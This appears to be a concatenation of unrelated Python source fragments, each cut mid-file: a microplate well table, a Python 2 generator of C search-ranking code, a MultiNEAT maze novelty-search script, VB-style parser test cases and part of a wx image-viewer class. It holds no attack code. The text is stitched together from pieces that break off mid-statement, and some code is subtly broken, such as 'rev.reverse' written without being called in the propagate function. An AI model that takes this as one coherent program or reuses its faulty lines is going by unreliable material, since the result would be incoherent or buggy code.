'well_id': 69,
},
70: {
'col_and_row': u'C22',
'row': 3,
'col': 22,
'well_id': 70,
},
71: {
'col_and_row': u'C23',
'row': 3,
'col': 23,
'well_id': 71,
},
72: {
'col_and_row': u'C24',
'row': 3,
'col': 24,
'well_id': 72,
},
73: {
'col_and_row': u'D1',
'row': 4,
'col': 1,
'well_id': 73,
},
74: {
'col_and_row': u'D2',
'row': 4,
'col': 2,
'well_id': 74,
},
75: {
'col_and_row': u'D3',
'row': 4,
'col': 3,
'well_id': 75,
},
76: {
'col_and_row': u'D4',
'row': 4,
'col': 4,
'well_id': 76,
},
77: {
'col_and_row': u'D5',
'row': 4,
'col': 5,
'well_id': 77,
},
78: {
'col_and_row': u'D6',
'row': 4,
'col': 6,
'well_id': 78,
},
79: {
'col_and_row': u'D7',
'row': 4,
'col': 7,
'well_id': 79,
},
80: {
'col_and_row': u'D8',
'row': 4,
'col': 8,
'well_id': 80,
},
81: {
'col_and_row': u'D9',
'row': 4,
'col': 9,
'well_id': 81,
},
82: {
'col_and_row': u'D10',
'row': 4,
'col': 10,
'well_id': 82,
},
83: {
'col_and_row': u'D11',
'row': 4,
'col': 11,
'well_id': 83,
},
84: {
'col_and_row': u'D12',
'row': 4,
'col': 12,
'well_id': 84,
},
85: {
'col_and_row': u'D13',
'row': 4,
'col': 13,
'well_id': 85,
},
86: {
'col_and_row': u'D14',
'row': 4,
'col': 14,
'well_id': 86,
},
87: {
'col_and_row': u'D15',
'row': 4,
'col': 15,
'well_id': 87,
},
88: {
'col_and_row': u'D16',
'row': 4,
'col': 16,
'well_id': 88,
| |
to a list, annotating them with logical levels."""
# declarations processed, now for statements
while (line != '' and line.rstrip() != '}'):
# process statements
toks, chars = ctok_nspace(line)
if (len(toks) > 2
and (toks[0] in decl.keys())
and (toks[1] == '=' or toks[1] == '+='
or toks[1] == '-=' or toks[1] == '/='
or toks[1] == '*=' or toks[1] == '&='
or toks[1] == '|=' or toks[1] == '^=')):
# assignment statement
# extend logical 'line' and tokenise it
while (toks[-1] != ';'):
nline = file.readline()
lineno += 1
ntoks, nchars = ctok_nspace(nline)
toks.extend(ntoks)
line = line.rstrip() + ' ' + nline
target = decl[toks[0]]
level = 1
# check that we're not assigning to something
# we're not supposed to
if (target.lineno == 0
and target.type[0:len('const')] == 'const'):
print '#line', lineno, '"' + args[0] + '"'
print '#error "assigning to const quantity"'
used[toks[0]] = toks[0]
for t in toks[2:]:
if (t in decl.keys()):
used[t] = t
if (decl[t].level == 6):
print '#line', lineno, '"' + args[0] + '"'
print '#error "accumulator used as rvalue"'
elif (decl[t].level > level):
level = decl[t].level
# increase level of assigned quantity, providing basic level
# inference
if (toks[0] in decl.keys()):
decl[toks[0]].level = level
list.append([lineno, level, line.strip()])
elif (len(toks) and line.strip()[0] == '#'):
list.append([lineno, 1, '/* ' + line.strip()[1:].lstrip() + ' */'])
else:
# its a different type of statement, check level differently
level = 1
for t in toks:
if (t in decl.keys()):
used[t] = t
if (decl[t].level == 6):
print '#line', lineno, '"' + args[0] + '"'
print '#error "accumulator used as rvalue"'
elif (decl[t].level > level):
level = decl[t].level
list.append([lineno, level, line.strip()])
# next line
line = file.readline()
lineno += 1
return [lineno, line]
def propagate(statements):
"""function to propagate levels from inside of braced statements
to the whole braced statement."""
# FIXME: needs to handle multiline blocks properly
prevlevel = 0
for s in statements:
if (s[2].find('}') >= 0):
if (s[2].find('{') < 0):
if (prevlevel > s[1]):
s[1] = prevlevel
prevlevel = s[1]
rev = map(lambda x: x, statements)
rev.reverse
prevlevel = 0
for s in rev:
if (s[2].find('{') >= 0):
if (s[2].find('}') < 0):
if (prevlevel > s[1]):
s[1] = prevlevel
prevlevel = s[1]
def output_decl(definitions, dent, mfile, params, macros):
prevline = -1
definitions.sort(lambda x, y: x.lineno - y.lineno)
for d in definitions:
# check that it isn't a pre-defined quantity that we've
# already declared
if (d.lineno != -1 or len(d.macro) > 0 or len(d.init) > 0 or len(d.fninit) > 0):
# check if we have to output a #line directive
if (d.lineno != prevline + 1 and d.lineno != -1):
#print '#line', d.lineno, '"' + mfile + '"'
pass
prevline = d.lineno
if (not len(d.macro)):
str = dent + d.type
if (len(d.type) and d.type[-1] == '*'):
str += d.name
else:
str += ' ' + d.name
if (len(d.init)):
str += ' '
# output the line, replacing parameters
toks, spaces = ctok(d.init)
for t in toks:
if (t in macros):
str += macros[t]
else:
str += t
print
str += ';'
print str
num = 0
for d in definitions:
# check that it isn't a pre-defined quantity that we've
# already declared
if (len(d.fninit) > 0):
print indent(dedent(d.fninit), len(dent))
def print_level(statements, level, dent, name, macros):
# output statements that depend on level
prevline = -1
while (len(statements)):
l, statements = statements[0], statements[1:]
if (l[1] == level):
# check if we have to output a #line directive
if (l[0] != prevline + 1):
#print '#line', l[0], '"' + args[0] + '"'
pass
prevline = l[0]
# check if we need to decrease the dent (has to be before
# output for ending } brackets to be indented properly)
if (l[2].find('}') >= 0):
if (l[2].find('{') < 0):
dent -= 4
# output the line, replacing parameters
toks, spaces = ctok(l[2])
sys.stdout.write(' ' * dent)
for t in toks:
if (t in macros):
sys.stdout.write(macros[t])
else:
sys.stdout.write(t)
print
# check if we need to increase the dent
if (l[2].find('{') >= 0):
if (l[2].find('}') < 0):
dent += 4
# get the next non-whitespace token, or nothing if there isn't one
def next_tok(toks):
while (len(toks) and toks[0].isspace() == True):
toks = toks[1:]
return toks
def contrib_replace(x):
if (len(x.contrib)):
return x.contrib
else:
return x.macro
def get_replace_map(decls, fn = (lambda x: x.macro)):
map = {}
for i in filter(lambda x: len(fn(decls[x])) > 0, decls):
map[i] = '(' + fn(decls[i]) + ')'
return map
if __name__ == "__main__":
try:
(options, args) = getopt.getopt(sys.argv[1:], 'hv',
['help', 'version', 'debug'])
except getopt.GetoptError:
usage(sys.argv[0])
sys.exit(2)
# simple processing of options
header = False
body = False
debug = False
help = False
for opt, arg in options:
if opt in ['--help', '-h']:
help = True
elif opt in ['--version', '-v']:
print '%s version 0.2\n' % sys.argv[0]
sys.exit(2)
elif opt == '--debug':
debug = True
if (len(args) != 2 and not help):
usage(sys.argv[0])
sys.exit(2)
params = {} # parameter declarations
post_decl = {} # declarations in post
post = [] # statements in post
post_used = {} # quantities used in post
decode_decl = {} # declarations in decode
decode = [] # statements in decode
comments = [] # initial comments
decode_used = {} # quantities used in decode
# define pre-declared quantities in all three function namespaces
#
# levels are:
# - 0: undetermined
# - 1: depends on nothing
# - 2: depends on docno
# - 3: depends on f_dt
# - 4: depends on offset
# - 5: depends on attr
# declarations for inherent quantities (these are not output directly)
ins_decl([decode_decl], [decode_used], 'const unsigned int f_t;', 1, 'query->term[qterm].f_t',
ex='number of documents in collection term occurs in')
ins_decl([decode_decl], [decode_used], 'const unsigned int F_t;', 1, 'query->term[qterm].F_t',
ex='number of times term occurs in collection')
ins_decl([decode_decl], [decode_used], 'const unsigned int f_dt;', 3,
ex='number of times term occurs in current document')
#ins_decl([decode_decl], [decode_used], 'const unsigned int offset;', 4)
#ins_decl([decode_decl], [decode_used], 'const unsigned int attr;', 5)
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'float accumulator;', 2, 'acc->acc.weight',
ex='accumulated score of document')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const unsigned int dterms = iobtree_size(idx->vocab);', 1,
ex='number of distinct terms in the collection')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const double terms = ((double) UINT_MAX) * idx->stats.terms_high + idx->stats.terms_low;', 1,
ex='number of terms in the collection')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const unsigned int N = docmap_entries(idx->map);', 1,
ex='number of documents in the collection')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'double avg_D_bytes;', 1, '', -1,
'''\
if (docmap_avg_bytes(idx->map, &avg_D_bytes) != DOCMAP_OK) {
return SEARCH_EINVAL;
}''',
ex='average bytes per document in the collection')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'double avg_D_terms;', 1, '', -1,
'''\
if (docmap_avg_words(idx->map, &avg_D_terms) != DOCMAP_OK) {
return SEARCH_EINVAL;
}''',
ex='average terms per document in the collection')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'double avg_D_dterms;', 1, '', -1,
'''\
if (docmap_avg_distinct_words(idx->map, &avg_D_dterms) != DOCMAP_OK) {
return SEARCH_EINVAL;
}''',
ex='average distinct terms per document in the collection')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'double avg_D_weight;', 1, '', -1,
'''if (docmap_avg_weight(idx->map, &avg_D_weight) != DOCMAP_OK) {
return SEARCH_EINVAL;
}''',
ex='average cosine weight per document in the collection')
# ins_decl([decode_decl, post_decl], None, 'const unsigned int Q_bytes;', 1, 'qstat->bytes',
# ex='number of bytes in the query string')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const unsigned int Q_terms = search_qterms(query);', 1,
ex='number of terms in the query')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const unsigned int Q_dterms;', 1, 'query->terms',
ex='number of distinct terms in the query')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const float Q_weight = search_qweight(query);', 1,
ex='cosine weight of query')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const unsigned int D_bytes;', 2, 'docmap_get_bytes_cached(idx->map, acc->acc.docno)', -1, '',
'if (docmap_cache(idx->map, docmap_get_cache(idx->map) | DOCMAP_CACHE_BYTES) != DOCMAP_OK) return SEARCH_EINVAL;', 'avg_D_bytes',
ex='number of bytes in the current document')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const unsigned int D_terms;', 2, 'DOCMAP_GET_WORDS(idx->map, acc->acc.docno)', -1, '',
'if (docmap_cache(idx->map, docmap_get_cache(idx->map) | DOCMAP_CACHE_WORDS) | |
#
# The script to run maze navigation experiment with Novelty Search optimization
# using the MultiNEAT library
#
# The Python standard library import
import os
import shutil
import math
import random
import time
import copy
import argparse
import pickle
# The MultiNEAT specific
import MultiNEAT as NEAT
from MultiNEAT.viz import Draw
# The helper used to visualize experiment results
import visualize
import utils
# The maze environment
import maze_environment as maze
import agent
import novelty_archive as archive
# The number of maze solving simulator steps
SOLVER_TIME_STEPS = 400
class ANN:
"""
The wrapper of MultiNEAT NeuralNetwork class
"""
def __init__(self, multi_neat_nn):
"""
Creates new instance of the wrapper for a given NeuralNetwork
"""
self.nn = multi_neat_nn
def activate(self, inputs):
"""
Function to activate associated NeuralNetwork with given inputs
Argumnets:
inputs: the array with network inputs.
Returns:
The control signal outputs.
"""
# append bias
inputs.append(1.0)
# activate and get outputs
self.nn.Input(inputs)
self.nn.Activate()
return self.nn.Output()
class Genome:
def __init__(self, gen):
self.genome = gen
self.key = gen.GetID()
class MazeSimulationTrial:
"""
The class to hold maze simulator execution parameters and results.
"""
def __init__(self, maze_env, population, archive):
"""
Creates new instance and initialize fileds.
Arguments:
maze_env: The maze environment as loaded from configuration file.
population: The population for this trial run
archive: The archive to hold NoveltyItems
"""
# The initial maze simulation environment
self.orig_maze_environment = maze_env
# The record store for evaluated maze solver agents
self.record_store = agent.AgentRecordStore()
# The NEAT population object
self.population = population
# The NoveltyItem archive
self.archive = archive
def eval_individual(genome_id, genome, genomes, n_items_map, generation):
"""
Evaluates the individual represented by genome.
Arguments:
genome_id: The ID of genome.
genome: The genome to evaluate.
genomes: The genomes population for current generation.
n_items_map: The map to hold novelty items for current generation.
generation: The current generation.
Return:
The True if successful solver found.
"""
# create NoveltyItem for genome and store it into map
n_item = archive.NoveltyItem(generation=generation, genomeId=genome_id)
n_items_map[genome_id] = n_item
# run the simulation
maze_env = copy.deepcopy(trial_sim.orig_maze_environment)
multi_net = NEAT.NeuralNetwork()
genome.BuildPhenotype(multi_net)
control_net = ANN(multi_net)
goal_fitness = maze.maze_simulation_evaluate(
env=maze_env,
net=control_net,
time_steps=SOLVER_TIME_STEPS,
n_item=n_item)
# Store simulation results into the agent record
record = agent.AgentRecord(generation=generation, agent_id=genome_id)
record.fitness = goal_fitness
record.x = maze_env.agent.location.x
record.y = maze_env.agent.location.y
record.hit_exit = maze_env.exit_found
#record.species_id = trial_sim.population.species.get_species_id(genome_id)
#record.species_age = record.generation - trial_sim.population.species.get_species(genome_id).created
# add record to the store
trial_sim.record_store.add_record(record)
# Evaluate the novelty of a genome and add the novelty item to the archive of Novelty items if appropriate
if not maze_env.exit_found:
# evaluate genome novelty and add it to the archive if appropriate
record.novelty = trial_sim.archive.evaluate_individual_novelty(genome=Genome(genome),
genomes=genomes, n_items_map=n_items_map)
# update fittest organisms list
trial_sim.archive.update_fittest_with_genome(genome=Genome(genome), n_items_map=n_items_map)
return (maze_env.exit_found, goal_fitness)
def eval_genomes(genomes, generation):
n_items_map = {} # The map to hold the novelty items for current generation
solver_genome = None
best_genome = None
max_fitness = 0
for _, genome in genomes:
found, goal_fitness = eval_individual(genome_id=genome.GetID(),
genome=genome,
genomes=genomes,
n_items_map=n_items_map,
generation=generation)
if found:
solver_genome = genome
max_fitness = goal_fitness
elif goal_fitness > max_fitness:
max_fitness = goal_fitness
best_genome = genome
# now adjust the archive settings and evaluate population
trial_sim.archive.end_of_generation()
for _, genome in genomes:
# set fitness value as a logarithm of a novelty score of a genome in the population
fitness = trial_sim.archive.evaluate_individual_novelty(genome=Genome(genome),
genomes=genomes,
n_items_map=n_items_map,
only_fitness=True)
# assign the adjusted fitness score to the genome
genome.SetFitness(fitness)
if solver_genome is not None:
return (solver_genome, True, max_fitness)
else:
return (best_genome, False, max_fitness)
def run_experiment(params, maze_env, novelty_archive, trial_out_dir, args=None, n_generations=100,
save_results=False, silent=False):
"""
The function to run the experiment against hyper-parameters
defined in the provided configuration file.
The winner genome will be rendered as a graph as well as the
important statistics of neuroevolution process execution.
Arguments:
params: The NEAT parameters
maze_env: The maze environment to use in simulation.
novelty_archive: The archive to work with NoveltyItems.
trial_out_dir: The directory to store outputs for this trial
n_generations: The number of generations to execute.
save_results: The flag to control if intermdiate results will be saved.
silent: If True than no intermediary outputs will be
presented until solution is found.
args: The command line arguments holder.
Returns:
True if experiment finished with successful solver found.
"""
# set random seed
seed = int(time.time())#1562938287#42#1563358622#1559231616#
random.seed(seed)
# Create Population
genome = NEAT.Genome(0, 11, 0, 2, False, NEAT.ActivationFunction.UNSIGNED_SIGMOID,
NEAT.ActivationFunction.UNSIGNED_SIGMOID, 0, params, 0)
pop = NEAT.Population(genome, params, True, 1.0, seed)
# Create the trial simulation
global trial_sim
trial_sim = MazeSimulationTrial(maze_env=maze_env, population=pop, archive=novelty_archive)
# Run for up to N generations.
start_time = time.time()
best_genome_ser = None
best_ever_goal_fitness = 0
best_id = -1
solution_found = False
for generation in range(n_generations):
gen_time = time.time()
# get list of current genomes
genomes = NEAT.GetGenomeList(pop)
genomes_tuples = []
for genome in genomes:
genomes_tuples.append((genome.GetID(), genome))
# evaluate genomes
genome, solution_found, fitness = eval_genomes(genomes_tuples, generation)
# store the best genome
if solution_found or best_ever_goal_fitness < fitness:
best_genome_ser = pickle.dumps(genome)
best_ever_goal_fitness = fitness
best_id = genome.GetID()
if solution_found:
print('Solution found at generation: %d, best fitness: %f, species count: %d' % (generation, fitness, len(pop.Species)))
break
# advance to the next generation
pop.Epoch()
# print statistics
gen_elapsed_time = time.time() - gen_time
print("\n****** Generation: %d ******\n" % generation)
print("Best objective fitness: %f, genome ID: %d" % (fitness, best_id))
print("Species count: %d" % len(pop.Species))
print("Generation elapsed time: %.3f sec" % (gen_elapsed_time))
print("Best objective fitness ever: %f, genome ID: %d" % (best_ever_goal_fitness, best_id))
print("Best novelty score: %f, genome ID: %d\n" % (pop.GetBestFitnessEver(), pop.GetBestGenome().GetID()))
elapsed_time = time.time() - start_time
best_genome = pickle.loads(best_genome_ser)
# write best genome to the file
best_genome_file = os.path.join(trial_out_dir, "best_genome.pickle")
with open(best_genome_file, 'wb') as genome_file:
pickle.dump(best_genome, genome_file)
# write the record store data
rs_file = os.path.join(trial_out_dir, "data.pickle")
trial_sim.record_store.dump(rs_file)
print("Record store file: %s" % rs_file)
print("Random seed:", seed)
print("Trial elapsed time: %.3f sec" % (elapsed_time))
print("Best objective fitness: %f, genome ID: %d" % (best_ever_goal_fitness, best_genome.GetID()))
print("Best novelty score: %f, genome ID: %d\n" % (pop.GetBestFitnessEver(), pop.GetBestGenome().GetID()))
# Visualize the experiment results
show_results = not silent
if save_results or show_results:
if args is None:
visualize.draw_maze_records(maze_env, trial_sim.record_store.records, view=show_results)
else:
visualize.draw_maze_records(maze_env, trial_sim.record_store.records,
view=show_results,
width=args.width,
height=args.height,
filename=os.path.join(trial_out_dir, 'maze_records.svg'))
# store NoveltyItems archive data
trial_sim.archive.write_fittest_to_file(path=os.path.join(trial_out_dir, 'ns_items_fittest.txt'))
trial_sim.archive.write_to_file(path=os.path.join(trial_out_dir, 'ns_items_all.txt'))
# create the best genome simulation path and render
maze_env = copy.deepcopy(trial_sim.orig_maze_environment)
multi_net = NEAT.NeuralNetwork()
best_genome.BuildPhenotype(multi_net)
control_net = ANN(multi_net)
path_points = []
evaluate_fitness = maze.maze_simulation_evaluate(
env=maze_env,
net=control_net,
time_steps=SOLVER_TIME_STEPS,
path_points=path_points)
print("Evaluated fitness: %f, of best agent ID: %d" % (evaluate_fitness, best_genome.GetID()))
visualize.draw_agent_path(trial_sim.orig_maze_environment, path_points, Genome(best_genome),
view=show_results,
width=args.width,
height=args.height,
filename=os.path.join(trial_out_dir, 'best_solver_path.svg'))
return solution_found
def create_params():
params = NEAT.Parameters()
params.PopulationSize = 500 # 250
params.DynamicCompatibility = True
params.AllowClones = False
params.AllowLoops = True
params.CompatTreshold = 6.0
params.CompatTresholdModifier = 0.3
params.YoungAgeTreshold = 15
params.SpeciesMaxStagnation = 20
params.OldAgeTreshold = 200
params.MinSpecies = 3
params.MaxSpecies = 20
params.RouletteWheelSelection = True
params.RecurrentProb = 0.2
params.OverallMutationRate = 0.3
params.LinkTries = 40
params.SpeciesDropoffAge = 200
params.DisjointCoeff = 1.0
params.ExcessCoeff = 1.0
params.MutateWeightsProb = 0.90
params.WeightMutationMaxPower = 0.8
params.WeightReplacementMaxPower = 5.0
params.MutateWeightsSevereProb = 0.5
params.WeightMutationRate = 0.75
#params.MaxWeight = 8
params.MutateAddNeuronProb = 0.1
params.MutateAddLinkProb = 0.5
params.MutateRemLinkProb = 0.1
params.Elitism = 0.1
params.CrossoverRate = 0.2
params.MultipointCrossoverRate = 0.6
params.InterspeciesCrossoverRate = 0.01
params.MutateNeuronTraitsProb = 0.1
params.MutateLinkTraitsProb = 0.1
return params
if __name__ == '__main__':
# read command line parameters
parser = argparse.ArgumentParser(description="The maze experiment runner (Novelty Search).")
parser.add_argument('-m', '--maze', default='medium',
help='The maze configuration to use.')
parser.add_argument('-g', '--generations', default=500, type=int,
help='The number of generations for the evolutionary process.')
parser.add_argument('-t', '--trials', type=int, default=1, help='The number of trials to run')
parser.add_argument('-n', '--ns_threshold', type=float, default=6.0,
help="The novelty threshold value for the archive of NoveltyItems.")
parser.add_argument('-r', '--location_sample_rate', type=int, default=4000,
help="The sample rate of agent position points saving during simulation steps.")
parser.add_argument('--width', type=int, default=400, help='The width of the records subplot')
parser.add_argument('--height', type=int, default=400, help='The height of the records subplot')
args = parser.parse_args()
if not (args.maze == 'medium' or args.maze == 'hard'):
print('Unsupported maze configuration: %s' % args.maze)
exit(1)
# The current working directory
local_dir = os.path.dirname(__file__)
# The directory to store outputs
out_dir = os.path.join(local_dir, 'out')
out_dir = os.path.join(out_dir, 'maze_ns_multineat')
# Clean results of previous run if any or init the ouput directory
utils.clear_output(out_dir)
# Run the experiment
| |
= "DriveID"',
])
# << Parsing tests >> (28 of 61)
# Unicode
tests.extend([
'cIÅ = 10',
'a = cIÅ + 30',
'a = "cIÅ there"',
])
# Unicode sub
tests.append("""
Sub cIÅ()
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (29 of 61)
# Simple If
tests.append("""
If a = 10 Then
b = 20
End If
If c < 1 Then
d = 15
End If
""")
# Empty If
tests.append("""
If a = 10 Then
End If
""")
# Empty If with comments
tests.append("""
If a = 10 Then ' comment here
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
End If
If c < 1 Or d Then
d = 15
End If
""")
# Simple If with compount And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
End If
""")
# If Not
tests.append("""
If Not a = 10 Then
b=2
End If
""")
# If With labels and comment
tests.append("""
10: If Not a = 10 Then 'heres a comment
20: b=2 ' antoher here
30: End If ' here too
""")
# << Parsing tests >> (30 of 61)
# Simple If/Else
tests.append("""
If a = 10 Then
b = 20
Else
b = 10
End If
If c < 1 Then
d = 15
Else
d = -12
End If
""")
# Empty If/Else
tests.append("""
If a = 10 Then
Else
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
Else
b = 1234
End If
If c < 1 Or d Then
d = 15
Else
e = "hello"
End If
""")
# Simple If with compount And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
Else
g = 12
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
Else
h = 1234
End If
""")
# << Parsing tests >> (31 of 61)
# Simple If/Else
tests.append("""
If a = 10 Then
b = 20
ElseIf a < 10 Then
b = 10
End If
If c < 1 Then
d = 15
ElseIf c = 1 Then
d = -12
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
ElseIf b = -102 Then
b = 1234
End If
If c < 1 Or d Then
d = 15
ElseIf e = Myfunction Then
e = "hello"
End If
""")
# Simple If with compount And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
ElseIf (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
g = 12
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
ElseIf k < 43 Then
h = 1234
End If
""")
# << Parsing tests >> (32 of 61)
# Simple If/Else
tests.append("""
If a = 10 Then
b = 20
ElseIf a < 10 Then
b = 10
Else
b = 1111
End If
If c < 1 Then
d = 15
ElseIf c = 1 Then
d = -12
Else
d = "wow"
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
ElseIf b = -102 Then
b = 1234
Else
b = 4321
End If
If c < 1 Or d Then
d = 15
ElseIf e = Myfunction Then
e = "hello"
Else
g = 1
End If
""")
# Simple If with compount And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
ElseIf (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
g = 12
Else
k = 3234
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
ElseIf k < 43 Then
h = 1234
Else
doIt
End If
""")
# << Parsing tests >> (33 of 61)
# Simple Nested If
tests.append("""
If a = 10 Then
b = 20
If c < 1 Then
d = 15
End If
End If
""")
# Complex nested If
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
ElseIf (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
ElseIf k < 43 Then
h = 1234
Else
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
End If
End If
Else
k = 3234
End If
""")
# << Parsing tests >> (34 of 61)
# Inline ifs
tests.extend([
"If a = 10 Then b = 20",
"If a = 20 And b = 5 Then d = 123",
"If a = 12 Then d = 1 Else g = 5",
"If a = 10 Then doit",
"If a = 10 Then doit 10, 20, 30",
"If a = 10 Then doit Else dont",
"If a = 10 Then doit 10, 20, 30 Else dont",
"If a = 10 Then doit 10, 20, 30 Else dont 5, 10, 15",
"If a = 10 Then Exit Function",
"If a = 10 Then Exit Function Else DoIt",
"If a = 10 Then Exit Function Else DoIt=1",
"If a = 10 Then Exit Function Else DoIt 1, 2, 3",
"If a = 10 Then DoIt Else Exit Function",
"If a = 10 Then DoIt=1 Else Exit Function",
"If a = 10 Then DoIt 1,2,34 Else Exit Function",
])
# Weird inline if followed by assignment that failed once
tests.extend([
"If a = 10 Then b a\nc=1",
])
# << Parsing tests >> (35 of 61)
# #If
tests.append("""
#If a = 10 Then
b = 20
#Else
c=2
#End If
#If c < 1 Then
d = 15
#Else
c=2
#End If
""")
# Empty #If
tests.append("""
#If a = 10 Then
#Else
c=2
#End If
""")
# Empty #If with comments
tests.append("""
#If a = 10 Then ' comment here
#Else
c=2
#End If
""")
# Simple #If with And/Or
tests.append("""
#If a = 10 And k = "test" Then
b = 20
#Else
c=2
#End If
#If c < 1 Or d Then
d = 15
#Else
c=2
#End If
""")
# Simple #If with compount And/Or expression
tests.append("""
#If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
#Else
c=2
#End If
#If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
#Else
c=2
#End If
""")
# #If Not
tests.append("""
#If Not a = 10 Then
b=2
#Else
c=2
#End If
""")
# << Parsing tests >> (36 of 61)
# simple sub
tests.append("""
Sub MySub()
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub()
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.extend(["""
Private Sub MySub()
a=10
n=20
c="hello"
End Sub""",
"""
Public Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
"""
Friend Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
"""
Private Static Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
])
# simple sub with gap in ()
tests.append("""
Sub MySub( )
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (37 of 61)
# simple sub
tests.append("""
Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x, y, z, a, b, c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (38 of 61)
# simple sub
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, b As Variant, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x As Single, y, z As Object, a, b As MyThing.Object, c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, y As Variant, z, a As Boolena, b, c As Long)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (39 of 61)
# simple sub
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b As Variant, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x() As Single, y, z As Object, Optional a, b As MyThing.Object, Optional c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, Optional y As Variant, Optional z, a As Boolena, b, c As Long)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with optional arguments and | |
SetAutoContrast (self,value):
if value != self.auto_contrast:
self.auto_contrast = value
self.adjust_contrast()
self.Refresh()
AutoContrast = property(GetAutoContrast,SetAutoContrast,doc=
"Automatically scale the image intensity")
def adjust_contrast (self):
"This automatically scales the intensity of the image."
if not self.AutoContrast: return
from numpy import average,histogram
image = self.Image
# Convert to grayscale if needed.
if image.ndim > 2: image = average(image,axis=0)
# Set the saturation level such that 99% of all pixels are
# below saturation level.
hist = histogram(image,bins=65536,range=[0,65535],normed=True)[0]
##print "sum(hist) = %g" % sum(hist)
integral = 0
for i in range(0,65536):
integral += hist[i]
if integral > 0.99: break
##print "sum(hist[0:%d]) = %g" % (i,sum(hist[0:i]))
self.SaturationLevel = i
def GetImageSize(self):
w,h = self.Image.shape[-2:]
return w*self.PixelSize,h*self.PixelSize
ImageSize = property(GetImageSize,doc="width and height of image in mm")
def GetViewportCenter(self):
"""Center (x,y) coordinates of the part of the image displayed in the
window in mm with respect to the top left corner of the image.
"""
w,h = self.ClientSize
x0,y0 = self.ViewStart
sx,sy = self.GetScrollPixelsPerUnit()
ox,oy = self.origin()
s = self.ScaleFactor
dx = self.PixelSize
cx,cy = (x0*sx-ox+w/2)/s*dx, (y0*sy-oy+h/2)/s*dx
return cx,cy
def SetViewportCenter(self,(cx,cy)):
"""Scroll such than the center the window is x mm from the
left edge and y mm from the top edge of the image.
"""
w,h = self.ClientSize
sx,sy = self.GetScrollPixelsPerUnit()
ox,oy = self.origin()
s = self.ScaleFactor
dx = self.PixelSize
x0 = cx/sx/dx*s-w/2+ox
y0 = cy/sx/dx*s-h/2+oy
self.Scroll(x0,y0)
self.viewport_center = self.GetViewportCenter()
ViewportCenter = property(GetViewportCenter,SetViewportCenter,
doc=GetViewportCenter.__doc__)
def GetImageOrigin(self):
if self.crosshair != None: x,y = self.crosshair
else: x,y = (self.Image.shape[-2]/2,self.Image.shape[-1]/2)
w,h = self.Image.shape[-2:]
return -x*self.PixelSize,-(h-y)*self.PixelSize
ImageOrigin = property(GetImageOrigin,doc="image center defined by crosshair")
def GetCrosshair(self):
"Returns the crosshair coordinates in pixels from the top left as (x,y) tuple"
return self.crosshair
def SetCrosshair (self,position):
"position must be a tuple (x,y)"
self.crosshair = position
self.Refresh()
Crosshair = property(GetCrosshair,SetCrosshair,doc=
